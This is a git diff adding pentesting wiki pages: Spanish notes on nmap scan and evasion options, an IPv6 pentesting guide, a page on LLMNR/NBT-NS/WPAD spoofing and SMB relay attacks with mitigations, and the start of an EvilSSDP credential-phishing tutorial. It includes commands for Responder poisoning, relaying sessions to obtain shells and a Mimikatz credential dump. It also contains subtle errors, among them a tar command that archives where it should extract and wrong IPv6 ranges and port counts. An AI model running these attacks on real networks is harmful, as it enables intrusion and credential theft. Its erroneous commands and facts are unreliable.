+**-sY** --&gt; Protocolo SCTP no llega a establecer la conexión, por lo que no hay registros, funciona como -PY
+
+**-sN,-sX,-sF** --&gt; Null, Fin, Xmas, sirven pueden penetrar algunos firewall y sacar información. Se basan en que los equipos que cumplan el estándar deberán responder con RST todas las peticiones que no tengan levantadas los lags de SYN, RST o ACK: abierto/filtrado\(nada\), cerrados\(RST\), filtrado \(ICMP inalcanzable\). No fiable en WIndows, CIsco, BSDI y OS/400. En unix sí.
+
+**-sM Maimon scan:** Envía flags FIN y ACK, usado para BSD, actualmente devolverá todo como cerrado.
+
+**-sA, sW** --&gt; ACK y Window, sirve para detectar firewalls, para saber si los puertos están filtrados o no. El -sW sí distingue entre abiertos/cerrados ya que los abiertos responden con un valor de window distinto: abiertos\(RST con ventana distinto de 0\), cerrado \(RST ventana = 0\), filtrado \(ICMP inalcanzable o nada\). No todos los equipos funcionan así, así que si sale todo cerrado, es que no funciona, si salen unos pocos abiertos es que funciona bien, y si salen muchos abiertos y pocos cerrados, es que funciona al revés.
+
+**-sI Idle scan** --&gt; Para los casos en los que hay un firewall activo pero que sabemos que este no filtra a una determinada Ip \(o cuando queremos simplemente anonimato\) podemos usar el escáner zombie \(sirve para todos los puertos\), para buscar posibles zombies podemos usar el scrpit ipidseq o el exploit auxiliary/scanner/ip/ipidseq. Este escaner se basa en el número IPID de los paquetes IP
+
+**--badsum --&gt;** Envían la suma mal, los equipos descartarían los paquetes, pero los firewall podrían responder algo, sirve para detectar firewalls
+
+**-sZ** --&gt; Escaner “raro” de SCTP, al enviar sondas con fragmentos cookie echo deben ser eliminadas si esta abierto o respondidas con ABORT si cerrado. Puede traspasar firewalls que no traspasa el init, lo malo es que no distingue entre filtrado y abierto.
+
+**-sO** --&gt; Protocol Ip scan: Envía cabeceras mal y vacías en las que a veces no se distingue ni el protocolo. Si llega ICMP unreachable protocol esta cerrado, si llega unreachable port esta abierto, si llega otro error, filtrado, si no llega nada, abierto\|filtrado
+
+**-b&lt;servidor&gt;** FTPhost--&gt; Sirve para escanear un host desde otro, eso lo hace conectándose el ftp de otra máquina y pidiendole que envía archivos a los puertos que se quiera escanear de otra máquina, según las respuestas sabremos si están abiertos o no. \[&lt;usuario&gt;:&lt;contraseña&gt;@\]&lt;servidor&gt;\[:&lt;puerto&gt;\] Casi todos los servidores ftps ya no dejan hacer esto y por lo tanto ya tiene poca utilidad práctica,
+
+**Centrar análisis:**
+
+**-p:** Sirve para dar los puertos a escanear. Para seleccionar los 65335: **-p-** o **-p all**. Nmap tiene una clasificaación interna según su popularidad. Por defecto usa los 1000 ppales. Con **-F** \(fast scan\) analiza los 100 ppales. Con **--top-ports &lt;numero&gt;** Analiza ese numero de ppales \(de 1 hasta los 65335\). Comprueba los puertos en orden aleatorio, para que eso no pase **-r**. También podemos seleccionar puertos: 20-30,80,443,1024- Esto ultimo significa que mire en adelante del 1024. También podemos agrupar los puertos por protocolos: U:53,T:21-25,80,139,S:9. También podemos escoger un rango dentro de los puertos populares de nmap: -p \[-1024\] analiza hasta el 1024 de los incluidos en nmap-services. **--port-ratio &lt;ratio&gt;** Analiza los puertos más comúnes que un ratio que debe estar entre 0 y 1
+
+**-sV** Escaneado de versión, se puede regular la intensidad de 0 a 9, por defecto 7.
+
+**--version-intensity &lt;numero&gt;** Regulamos la intensidad, de forma que cuanto más bajo solo lanzará las sondas más probables, pero no todas. Con esto podemos acortar considerablemente el tiempo de escaneo UDP
+
+**-O** Deteccion de os
+
+**--osscan-limit** Para escanear bien un host se necesita que al menos haya 1 puerto abierto y otro cerrado, si no se da esta condición y hemos puesto esto, no intenta hacer predicción de os \(ahorra tiempo\)
+
+**--osscan-guess** Cuando la detección de os no es perfecta esto hace que se esfuerce más
+
+**Scripts**
+
+--script _&lt;filename&gt;_\|_&lt;category&gt;_\|_&lt;directory&gt;_\|_&lt;expression&gt;_\[,...\]
+
+Para usar los de por efecto vale con -sC o --script=default
+
+Los tipos que hay son de: auth, broadcast, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, and vuln
+
+* **Auth:** ejecuta todos sus _scripts_ disponibles para autenticación
+* **Default:** ejecuta los _scripts_ básicos por defecto de la herramienta
+* **Discovery:** recupera información del _target_ o víctima
+* **External:** _script_ para utilizar recursos externos
+* **Intrusive:** utiliza _scripts_ que son considerados intrusivos para la víctima o _target_
+* **Malware:** revisa si hay conexiones abiertas por códigos maliciosos o _backdoors_ \(puertas traseras\)
+* **Safe:** ejecuta _scripts_ que no son intrusivos
+* **Vuln:** descubre las vulnerabilidades más conocidas
+* **All:** ejecuta absolutamente todos los _scripts_ con extensión NSE disponibles
+
+Para buscar scripts:
+
+ **nmap --script-help="http-\*" -&gt; Los que empiecen por http-**
+
+ **nmap --script-help="not intrusive" -&gt; Todos menos esos**
+
+ **nmap --script-help="default or safe" -&gt; Los que estan en uno o en otro o en ambos**
+
+ **nmap --script-help="default and safe" --&gt; Los que estan en ambos**
+
+ **nmap --script-help="\(default or safe or intrusive\) and not http-\*"**
+
+--script-args _&lt;n1&gt;_=_&lt;v1&gt;_,_&lt;n2&gt;_={_&lt;n3&gt;_=_&lt;v3&gt;_},_&lt;n4&gt;_={_&lt;v4&gt;_,_&lt;v5&gt;_}
+
+--script-args-file _&lt;filename&gt;_
+
+--script-help _&lt;filename&gt;_\|_&lt;category&gt;_\|_&lt;directory&gt;_\|_&lt;expression&gt;_\|all\[,...\]
+
+--script-trace ---&gt; Da info de como va elscript
+
+--script-updatedb
+
+**Para usar un script solo hay que poner: namp --script Nombre\_del\_script objetivo** --&gt; Al poner el script se ejecutará tanto el script como el escaner, asi que tambien se pueden poner opciones del escaner, podemos añadir **“safe=1”** para que se ejecuten solo los que sean seguros.
+
+**Control tiempo**
+
+**Nmap puede modificar el tiempo en segundos, minutos, ms:** --host-timeout arguments 900000ms, 900, 900s, and 15m all do the same thing.
+
+Nmap divide el numero total de host a escanear en grupos y analiza esos grupos en bloques de forma que hasta que no han sido analizados todos, no pasa al siguiente bloque \(y el usuario tampoco recibe ninguna actualización hasta que se haya analizado el bloque\) de esta forma, es más óptimo para nmap usar grupos grandes. Por defecto en clase C usa 256.
+
+Se puede cambiar con**--min-hostgroup** _**&lt;numhosts&gt;**_**;** **--max-hostgroup** _**&lt;numhosts&gt;**_ \(Adjust parallel scan group sizes\)
+
+Se puede controlar el numero de escaners en paralelo pero es mejor que no \(nmpa ya incorpora control automatico en base al estado de la red\): **--min-parallelism** _**&lt;numprobes&gt;**_**;** **--max-parallelism** _**&lt;numprobes&gt;**_
+
+Podemos modificar el rtt timeout, pero no suele ser necesario: **--min-rtt-timeout** _**&lt;time&gt;**_**,** **--max-rtt-timeout** _**&lt;time&gt;**_**,** **--initial-rtt-timeout** _**&lt;time&gt;**_
+
+Podemos modificar el numero de intentos:**--max-retries** _**&lt;numtries&gt;**_
+
+Podemos modificar el tiempo de escaneado de un host: **--host-timeout** _**&lt;time&gt;**_
+
+Podemos modificar el tiempo entre cada prueba para que vaya despacio: **--scan-delay** _**&lt;time&gt;**_**;** **--max-scan-delay** _**&lt;time&gt;**_
+
+Podemos modificar el numero de paquetes por segundo: **--min-rate** _**&lt;number&gt;**_**;** **--max-rate** _**&lt;number&gt;**_
+
+Muchos puertos tardan mucho en responder al estar filtrados o cerrados, si solo nos interesan los abiertos, podemos ir más rápido con: **--defeat-rst-ratelimit**
+
+Para definir lo agresivo que queremos que sea nmap: -T paranoid\|sneaky\|polite\|normal\|aggressive\|insane
+
+-T \(0-1\)
+
+-T0 --&gt; Solo se escanea 1 puerto a la vez y se espera 5min hasta el siguiente
+
+-T1 y T2 --&gt; Muy parecidos pero solo esperan 15 y 0,4seg respectivamente enttre cada prueba
+
+-T3 --&gt; Funcionamiento por defecto, incluye en paralelo
+
+-T4 --&gt; --max-rtt-timeout 1250ms --min-rtt-timeout 100ms --initial-rtt-timeout 500ms --max-retries 6 --max-scan-delay 10ms
+
+-T5 --&gt; --max-rtt-timeout 300ms --min-rtt-timeout 50ms --initial-rtt-timeout 250ms --max-retries 2 --host-timeout 15m --max-scan-delay 5ms
+
+**Firewall/IDS**
+
+No dejan pasar a puertos y analizan paquetes.
+
+**-f** Para fragmentar paquetes, por defecto los fragmenta en 8bytes después de la cabecera, para especificar ese tamaño usamos ..mtu \(con esto, no usar -f\), el offset debe ser multiplo de 8. **Escaners de version y scripts no soportan la fragmentacion**
+
+**-D decoy1,decoy2,ME** Nmap envia escaneres pero con otras direcciones IPs como origen, de esta forma te esconden a ti. Si pones el ME en la lista, nmap te situara ahi, mejor poner 5 o 6 antes de ti para que te enmascaren completamente. Se pueden generar iPs aleatorias con RND:&lt;numero&gt; Para generar &lt;numero&gt; de Ips aleatorias. No funcionan con detector de versiones sin conexion de TCP. Si estas dentro de una red, te interesa usar Ips que esten activas, pues sino será muy facil averiguar que tu eres la unica activa.
+
+Para usar Ips aleatorias: nmap-D RND: 10 Ip\_objetivo
+
+**-S IP** Para cuando Nmap no pilla tu dirección Ip se la tienes que dar con eso. También sirve para hacer pensar que hay otro objetivo escaneandoles.
+
+**-e &lt;interface&gt;** Para elegir la interfaz
+
+Muchos administradores dejan puertos de entrada abiertos para que todo funcione correctamente y les es más fácil que buscar otra solución. Estos pueden ser los puertos DNS o los de FTP... para busca esta vulnerabilidad nmap incorpora: **--source-port** _**&lt;portnumber&gt;**_**;-g** _**&lt;portnumber&gt;**_ _Son equivalentes_
+
+**--data** _**&lt;hex string&gt;**_ Para enviar texto hexadecimal: --data 0xdeadbeef and --data \xCA\xFE\x09
+
+**--data-string** _**&lt;string&gt;**_ Para enviar un texto normal: --data-string "Scan conducted by Security Ops, extension 7192"
+
+**--data-length** _**&lt;number&gt;**_ Nmap envía solo cabeceras, con esto logramos que añada a estar un numero de bytes mas \(que se generaran aleatoriamente\)
+
+Para configurar el paquete IP completamente usar **--ip-options**
+
+If you wish to see the options in packets sent and received, specify --packet-trace. For more information and examples of using IP options with Nmap, see [http://seclists.org/nmap-dev/2006/q3/52](http://seclists.org/nmap-dev/2006/q3/52).
+
+**--ttl** _**&lt;value&gt;**_
+
+**--randomize-hosts** Para que el ataque sea menos obvio
+
+**--spoof-mac** _**&lt;MAC address, prefix, or vendor name&gt;**_ Para cambiar la mac ejemplos: Apple, 0, 01:02:03:04:05:06, deadbeefcafe, 0020F2, and Cisco
+
+**--proxies** _**&lt;Comma-separated list of proxy URLs&gt;**_ Para usar proxies, a veces un proxy no mantiene tantas conexiones abiertas como nmap quiere por lo que habria que modificar el paralelismo: --max-parallelism
+
+**-sP** Para descubrir host en la red en la que estamos por ARP
+
+Muchos administradores crean una regla en el firewall que permite pasar todos los paquetes que provienen de un puerto en particular \(como el 20,53 y 67\), podemos decire a nmap que mande nuestros paquetes desde esos puertos: **nmap --source-port 53 Ip**
+
+**Salidas**
+
+**-oN file** Salida normal
+
+**-oX file** Salida XML
+
+**-oS file** Salida de script kidies
+
+**-oG file** Salida grepable
+
+**-oA file** Todos menos -oS
+
+**-v level** verbosity
+
+**-d level** debugin
+
+**--reason** Porqué del host y estado
+
+**--stats-every time** Cada ese tiempo nos dice como va
+
+**--packet-trace** Para ver que paquetes salen se pueden especificar filtros como: --version-trace o --script-trace
+
+**--open** muestra los abiertos, abiertos\|filtrados y los no filtrados
+
+**--resume file** Saca un resumen
+
+**Miscelanea**
+
+**-6** Permite ipv6
+
+**-A** es lo mismo que -O -sV -sC --traceroute
+
+**Run time**
+
+Mientras corre nmap podemos cambiar opciones:
+
+v / V Increase / decrease the verbosity level
+
+d / D Increase / decrease the debugging Level
+
+p / P Turn on / off packet tracing
+
+? Print a runtime interaction help screen
+
+**Vulscan**
+
+Script de nmap que mira las versiones de los servicios obtenidos en una base de datos offline \(que descarga de otras muy importantes\) y devuelve las posibles vulnerabilidades
+
+Las BD que usa son:
+
+1. Scipvuldb.csv \| [http://www.scip.ch/en/?vuldb](http://www.scip.ch/en/?vuldb)
+2. Cve.csv \| [http://cve.mitre.org](http://cve.mitre.org/)
+3. Osvdb.csv \| [http://www.osvdb.org](http://www.osvdb.org/)
+4. Securityfocus.csv \| [http://www.securityfocus.com/bid/](http://www.securityfocus.com/bid/)
+5. Securitytracker.csv \| [http://www.securitytracker.com](http://www.securitytracker.com/)
+6. Xforce.csv \| [http://xforce.iss.net](http://xforce.iss.net/)
+7. Exploitdb.csv \| [http://www.exploit-db.com](http://www.exploit-db.com/)
+8. Openvas.csv \| [http://www.openvas.org](http://www.openvas.org/)
+
+Para descargarlo e instalarlo en la carpeta de Nmap:
+
+wget http://www.computec.ch/projekte/vulscan/download/nmap\_nse\_vulscan-2.0.tar.gz && tar -czvf nmap\_nse\_vulscan-2.0.tar.gz vulscan/ && sudo cp -r vulscan/ /usr/share/nmap/scripts/
+
+También habría que descargar los paquetes de las BD y añadirlos a /usr/share/nmap/scripts/vulscan/
+
+Uso:
+
+Para usar todos: sudo nmap -sV --script=vulscan HOST\_A\_ESCANEAR
+
+Para usar una BD específica: sudo nmap -sV --script=vulscan --script-args vulscandb=cve.csv HOST\_A\_ESCANEAR
+
diff --git a/pentesting/pentesting-network/pentesting-ipv6.md b/pentesting/pentesting-network/pentesting-ipv6.md
new file mode 100644
index 00000000..322d983d
--- /dev/null
+++ b/pentesting/pentesting-network/pentesting-ipv6.md
@@ -0,0 +1,98 @@
+# Pentesting IPv6
+
+## IPv6 Basic theory
+
+### Networks
+
+In an IPv6 address, the **first 48 bits are the network prefix**. The **next 16 bits are the subnet ID** and are used for defining subnets. The last **64 bits are the interface identifier** \(which is also known as the Interface ID or the Device ID, is for devices\). If necessary, the bits that are normally reserved for the Device ID can be used for additional subnet masking.
+
+There is not ARP in IPv6. Instead, there is **ICMPv6 NS \(Neighbor Solicitation\) and NA \(Neighbor Advertisement\)**. The **NS** is used to resolve and address, so it sends **multicast** packets. The **NA** is **unicast** as is used to answer the NS. A NA packet could also be sent without needing a NS packet.
+
+**0:0:0:0:0:0:0:1** = 1  – This is 127.0.0.1 equivalent in IPv4.
+
+**Link-local Addresses:** These are private address that is not meant to be routed on the internet. They can be used locally by private or temporary LANs for sharing and distribution of file among devices on the LAN. Other devices in your local LAN using this kind of addresses can be found sending a pig to the multicast address ff02::01  
+**FE80::/10**  – Link-local unicast address range.
+
+```bash
+ping6 –I eth0 -c 5 ff02::1 > /dev/null 2>&1
+ip neigh | grep ^fe80
+
+#Or you could also use
+alive6 eth0
+```
+
+If you **know the MAC address of a host in the same net** as you \(you could just ping its ipv4 address and view the arp table to found its MAC address\), you can calculate his Link-local address to communicate with him.  
+Suppose the **MAC address** is **`12:34:56:78:9a:bc`**
+
+1. To IPv6 notation: **`1234:5678:9abc`**
+2. Append `fe80::` at the begging and Insert `fffe` in the middle: **`fe80::`**`1234:56`**`ff:fe`**`78:9abc`
+3. Invert seventh bit from the left, from 0001 0010 to 0001 0000: `fe80::1`**`0`**`34:5678:9abc`
+4. `fe80::1034:5678:9abc`
+
+**Unique local  address:**  This type of ipv6 address also  not intended to be routed on the public internet. Unique local is a replacement of site-local address, that allows communication within a site while being routable to a multiple local networks.  
+**FEC00::/7**  – The unique local address range.
+
+**Multicast Address:** This can also be refered to as One-to-Many. Packets addressed to multicast address are delivered to all interface identified by the multicast address. Multicast address types are easily notable because they normally  begins with FF.  
+**FF00::/8**  – The multicast range.
+
+**Anycast:**  This form of ipv6 address is similar to the multicast address with a slight difference. Anycast address can also be refered to as One to Nearest. It can be used to address packets meant for multiple interfaces; but usually it sends packets to the first interface it finds as defined in the routing distance. This means it send packets to the closest interface as determined by routing protocols.  
+**20000::/3**  – The global unicast address range.
+
+fe80::/10--&gt; Unique Link-Local \(169.254.x.x\) \[fe80:0000:0000:0000:0000:0000:0000:0000,febf:ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff\]  
+fc00::/7 --&gt; Unique Local-Unicast \(10.x.x.x, 172.16.x.x, 192.168.x.x\) \[\]  
+2000::/3 --&gt; Global Unicast  
+ff02::1 --&gt; Multicast All Nodes  
+ff02::2 --&gt; Multicast Router Nodes
+
+### **Guess the IPv6 of a machine**
+
+**Way 1**
+
+The IPv6 of fe80::/10 are based on the MAC. If you have the IPv6 of a device inside a network and you want to guess the IPv6 of another device of the network, you can get its MAC address using a ping \(inside the arp table\).
+
+**Way2**
+
+You can send a ping6 to the multicast and get the IPv6 address inside the arp table.
+
+```bash
+service ufw stop #Stop firewall
+ping6 -I <IFACE> ff02::1 #You could also make: ping6 -I <IPV6> ff02::1 if you want to make a ping to a specific IP Address
+ip -6 neigh
+alive6
+use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement; set INTERFACE eth1; run
+```
+
+## IPv6 MitM
+
+Man in the middle with spoofed ICMPv6 neighbor advertisement.
+
+* Man in the middle with spoofed ICMPv6 router advertisement.
+* Man in the middle using ICMPv6 redirect or ICMPv6 too big to implant route.
+* Man in the middle to attack mobile IPv6 but requires ipsec to be disabled.
+* Man in the middle with rogue DHCPv6 server
+
+
+
+## Discovering IPv6 addresses in the wild
+
+### Sudomains
+
+You can use google and other browsers to search for subdomains like "ipv6.\*"
+
+```bash
+site:ipv6./
+```
+
+### DNS
+
+You could also try to search "**AXFR**"\(zone transfer\), "**AAAA**"\(IPv6\) or even "**ANY**" \(all\) registry in DNS ****to find IPv6 addresses.
+
+### Ping6
+
+Once some IPv6 devices of an organisation have been found, you could try to use `ping6` to check nearby addresses.
+
+## References
+
+* [http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html](http://www.firewall.cx/networking-topics/protocols/877-ipv6-subnetting-how-to-subnet-ipv6.html)
+* [https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904](https://www.sans.org/reading-room/whitepapers/detection/complete-guide-ipv6-attack-defense-33904)
+
diff --git a/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
new file mode 100644
index 00000000..16cdd71c
--- /dev/null
+++ b/pentesting/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md
@@ -0,0 +1,149 @@
+# Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
+
+## Network protocols
+
+### LLMNR, NBT-NS, and mDNS
+
+Microsoft systems use Link-Local Multicast Name Resolution \(LLMNR\) and the NetBIOS Name Service \(NBT-NS\) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS \(mDNS\) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.
+
+You can impersonate services that are searched by hosts using Responder to send fake responses.  
+Read here more information about [how to Impersonate services with Responder](spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md).
+
+### WPAD
+
+Many browsers use Web Proxy Auto-Discovery \(WPAD\) to load proxy settings from the network. A WPAD server provides client proxy settings via a particular URL \(e.g., _http://wpad.example.org/wpad.dat_\) upon being identified through any of the following:
+
+* DHCP, using a code 252 entry[34](https://learning.oreilly.com/library/view/Network+Security+Assessment,+3rd+Edition/9781491911044/ch05.html#ch05fn41)
+* DNS, searching for the _wpad_ hostname in the local domain
+* Microsoft LLMNR and NBT-NS \(in the event of DNS lookup failure\)
+
+Responder automates the WPAD attack—running a proxy and directing clients to a malicious WPAD server via DHCP, DNS, LLMNR, and NBT-NS.
+
+## Responder
+
+> Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to _specific_ NBT-NS \(NetBIOS Name Service\) queries based on their name suffix \(see: [http://support.microsoft.com/kb/163409](http://support.microsoft.com/kb/163409)\). By default, the tool will only answer to File Server Service request, which is for SMB.
+>
+> The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don't break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.
+
+[**Responder**](https://github.com/lgandx/Responder) is installed in kali by default and the config file is located in _/etc/responder/Responder.conf_  
+You can find here **Responder for windows** here: [https://github.com/lgandx/Responder-Windows](https://github.com/lgandx/Responder-Windows)  
+__To run default Responder behaviour you only have to execute:
+
+```text
+responder -I <Iface>
+```
+
+![](../../.gitbook/assets/image%20%28235%29.png)
+
+By **default**, the **WPAD impersonation won't be executed**, but you can execute it doing:
+
+```text
+responder -I <Iface> --wpad
+```
+
+### Capturing credentials
+
+Responder is going to **impersonate all the service using the mentioned protocols**. Once some user try to access a service being resolved using those protocols, **he will try to authenticate against Responde**r and Responder will be able to **capture** the "credentials" \(most probably a **NTLMv2 Challenge/Response**\):
+
+![](../../.gitbook/assets/poison.jpg)
+
+## **Inveigh**
+
+> Inveigh is a PowerShell ADIDNS/LLMNR/NBNS/mDNS/DNS spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system.
+
+[**Inveigh** ](https://github.com/Kevin-Robertson/Inveigh)is a PowerShell script that has the same main features as Responder.
+
+![](../../.gitbook/assets/45662029-1b5e6300-bace-11e8-8180-32f8d377d48b.png)
+
+## Relay Attack
+
+**Most of the information for this section was taken from** [**https://intrinium.com/smb-relay-attack-tutorial/**](https://intrinium.com/smb-relay-attack-tutorial/)\*\*\*\*
+
+This attack uses the Responder toolkit to **capture SMB authentication sessions** on an internal network, and **relays** them to a **target machine**. If the authentication **session is successful**, it will automatically drop you into a **system** **shell**.  
+Please, note that the relayed authentication must be from a **user which has Local Admin access to the relayed** host and **SMB signing must be disabled**.
+
+The 2 main **tools** to perform this attack are: **MultyRelay** \(from responder\) and **smbrealyx** \(from impacket\).
+
+Independently of the tool, first, you need to **turn Off SMB and HTTP servers** in  ****_**/usr/share/responder/Responder.conf**_ and then execute responder on the desired **interface**: `responder -I eth0 -rv`  
+If you want to use **smbrelayx** now you should run:
+
+```text
+smbrelayx.py -h <IP target> -c "ipconfig"
+```
+
+If you want to use **MultiRelay**, go to _**/usr/share/responder/tools**_ and execute MultiRelay \(`-t <IP target> -u <User>`\):
+
+```bash
+python MultiRelay.py -t <IP target> -u ALL #If "ALL" then all users are relayed
+```
+
+![](../../.gitbook/assets/image%20%28153%29.png)
+
+### Post-Exploitation \(MultiRelay\)
+
+**At this point you can shut off Responder; we don’t need it anymore.  
+With the shell access we have obtained, there are many actions that we can perform directly from here:**
+
+![Step 41 \| Intrinium.com](https://intrinium.com/wp-content/uploads/step41.png)
+
+**Mimikatz** commands can also be performed directly **from the shell**. Unfortunately, the target used for this tutorial’s antivirus ate my mimikatz, but the following commands can be executed to run mimikatz, as well as the entire pallette of modules.: **`Mimi sekurlsa::logonpasswords`**
+
+## InveighZero
+
+InveighZero is a C\# LLMNR/NBNS/mDNS/DNS/DHCPv6 spoofer and man-in-the-middle tool designed to assist penetration testers/red teamers that find themselves limited to a Windows system. This version shares many features with the PowerShell version of Inveigh.  
+More information in the [github of the project](https://github.com/Kevin-Robertson/InveighZero).
+
+## Solution
+
+### **Disabling LLMNR**
+
+To disable LLMNR in your domain for DNS clients, open gpedit.msc.  
+Navigate to Computer Configuration-&gt;Administrative Templates-&gt;Network-&gt;DNS client.  
+Locate the option “Turn off multicast name resolution” and click “policy setting”:
+
+![](../../.gitbook/assets/1%20%281%29.jpg)
+
+Once the new window opens, enable this option, press Apply and click OK:
+
+![](../../.gitbook/assets/2.jpg)
+
+### **Disabling NBT-NS**
+
+One option for disabling NBT-NS is to use DHCP scope options.
+
+If using Microsoft's DHCP server, select the scope that you want to disable NBT-NS for. Right click “Scope Options” and click “Configure Options”. In the example below, the DHCP scope in which I want to disable NBT-NS for is 192.168.1.100.
+
+![](../../.gitbook/assets/3.jpg)
+
+In the Scope Options window, navigate to the advanced tab, change the drop down window to “Microsoft Windows 2000 Options”:
+
+![](../../.gitbook/assets/4.jpg)
+
+Select the option “001 Microsoft Disable Netbios Option” from the list and change its value to “0x2”, click Apply and then OK:
+
+![](../../.gitbook/assets/5.jpg)
+
+### **WPAD**
+
+To mitigate against the WPAD attack, you can add an entry for "wpad" in your DNS zone. Note that the DNS entry does not need to point to a valid WPAD server. As long as the queries are resolved, the attack will be prevented.
+
+### Multi-relay
+
+1. **Forcing SMB Signing on all local windows machines**. This setting will digitally sign each and every SMB session which forces both the client and server to verify the source of the packets before continuing. This setting is only enabled by default on Domain Controllers. The following articles from Microsoft detail these settings \(which can be enabled through group policy\), and how to implement them.
+
+[https://blogs.technet.microsoft.com/josebda/2010/12/01/the-basics-of-smb-signing-covering-both-smb1-and-smb2/](https://blogs.technet.microsoft.com/josebda/2010/12/01/the-basics-of-smb-signing-covering-both-smb1-and-smb2/)
+
+[https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/microsoft-network-client-digitally-sign-communications-always](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/microsoft-network-client-digitally-sign-communications-always)
+
+2. **Reviewing and ensuring that the users on the local network can only remotely login to machines in which it is necessary**. For example: Sally can only log in to Sally’s workstation. If an attacker were to intercept Sally’s SMB Auth session, they could not relay the session to any workstations, rendering this method useless.
+
+3. **Restrict NTLM Authentication on the local network as much as possible**. This attack cannot take advantage of Kerberos authentication, so by limiting the amount of NTLM that’s occurring, this attack can be greatly hindered. There is information from Microsoft on making this happen, but be warned.. If Kerberos authentication fails for whatever reason, it generally falls back onto NTLM. If you disable it entirely, your network might grind to a halt.
+
+4. **Prevent unauthorised users on your network**. An insider threat will likely not be utilising an SMB Relay attack, as they already have network credentials. By beefing up your physical security policies, preventing rogue devices on the network with ACLs and MAC Filtering, and ensuring proper network segmentation, you can greatly limit the threat of this attack being performed.
+
+## References
+
+**Images from:** [https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/](https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/)  
+[https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/](https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/)  
+[https://intrinium.com/smb-relay-attack-tutorial/](https://intrinium.com/smb-relay-attack-tutorial/)
+
diff --git a/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md
new file mode 100644
index 00000000..33a3e30d
--- /dev/null
+++ b/pentesting/pentesting-network/spoofing-ssdp-and-upnp-devices.md
@@ -0,0 +1,149 @@
+# Spoofing SSDP and UPnP Devices with EvilSSDP
+
+**This post was copied from** [**https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/**](https://www.hackingarticles.in/evil-ssdp-spoofing-the-ssdp-and-upnp-devices/)\*\*\*\*
+
+## **Introduction**
+
+### **What is SSDP?**
+
+SSDP or Simple Service Discovery Protocol is a network protocol designed for advertisement and discovery of network services. It can work without any DHCP or DNS Configuration. It was designed to be used in residential or small office environments. It uses UDP as the underlying transport protocol on port 1900. It uses the HTTP method NOTIFY to announce the establishment or withdrawal of services to a multicast group. It is the basis of the discovery protocol UPnP.
+
+### **What are UPnP devices?**
+
+UPnP or Universal Plug and Play is a set of networking protocols that allows networked devices, such as personal computers, printers, Internet gateways, Wi-Fi access points, and mobile devices to discover each other’s availability on the network and establish network services for communications, data sharing, and entertainment. The UPnP architecture supports zero-configuration networking. A UPnP compatible device from any vendor can dynamically join a network, obtain an IP address, announce its name, advertise or convey its capabilities upon request, and learn about the presence and capabilities of other devices.
+
+Now that we understood the basic functions of SSDP or UPnP, let’s use it to manipulate the target user in order to steal their credentials.
+
+### **Installation**
+
+The Evil SSDP too was developed by [initstring](https://twitter.com/init_string). This tool is hosted on the GitHub. We will be using the git clone command to clone all the contents of the git onto our attacker machine. The git clone command will create a directory with the same name as on GitHub. Since the tool is developed in Python version 3, we will have to use the python3 followed by the name of the .py file in order to run the program. Here we can see a basic help screen of the tool.
+
+```bash
+git clone https://github.com/initstring/evil-ssdp.git
+cd evil-ssdp/ls
+python3 evil-ssdp.py --help
+```
+
+![](https://i0.wp.com/1.bp.blogspot.com/-O6lddDvxqts/Xkq5PHqeE_I/AAAAAAAAisQ/FKOCxVwT9cMy54lLy0SsYcKoM5Q95K5mQCLcBGAsYHQ/s1600/1.png?w=687&ssl=1)
+
+In the cloned directory, we will find a directory named templates. It contains all the pre complied templates that can be used to phish the target user.
+
+## **Spoofing Scanner SSDP**
+
+Now, that we ran the tool without any issues, let’s use it to gain some sweet credentials. In this first Practical, we will be spoofing a Scanner as a reliable UPnP device. To begin, we will have to configure the template.
+
+### **Template Configuration**
+
+To use the tool, we will have to provide the network interface. Here, on our attacker machine, we have the “eth0” as our interface, you can find your interface using the “ifconfig” command.
+
+After providing the interface, we will use the “–template” parameter to pass a template that we found earlier in the templates directory. To spoof a scanner, we will be running the following command. As we can see that the tool has done its job and hosted multiple template files on our attacker machine at port 8888. We also have the SMB pointer hosted as well.
+
+```bash
+ls temlates/
+python3 evil-ssdp.py eth0 --template scanner
+```
+
+![](https://i0.wp.com/1.bp.blogspot.com/-kg05jQ03Fnw/Xkq5Qing_qI/AAAAAAAAisk/GYK8MuCKqKUalqh3DHGWVRoyDlAQaxUrwCLcBGAsYHQ/s1600/2.png?w=687&ssl=1)
+
+### **Manipulating User**
+
+The next logical step is to manipulate the user to click on the application. Being on the same network as the target will show our fake scanner on its explorer. This is where the UPnP is in works. The Evil SSDP tool creates this genuine-looking scanner on the system on the target without any kind of forced interaction with the target.
+
+![](https://i1.wp.com/1.bp.blogspot.com/-_05xXp10Buk/Xkq5Qz4yosI/AAAAAAAAiso/HdHr0qJ59rkR2ur_UYcrHMdf93uqMhXUwCLcBGAsYHQ/s1600/3.png?w=687&ssl=1)
+
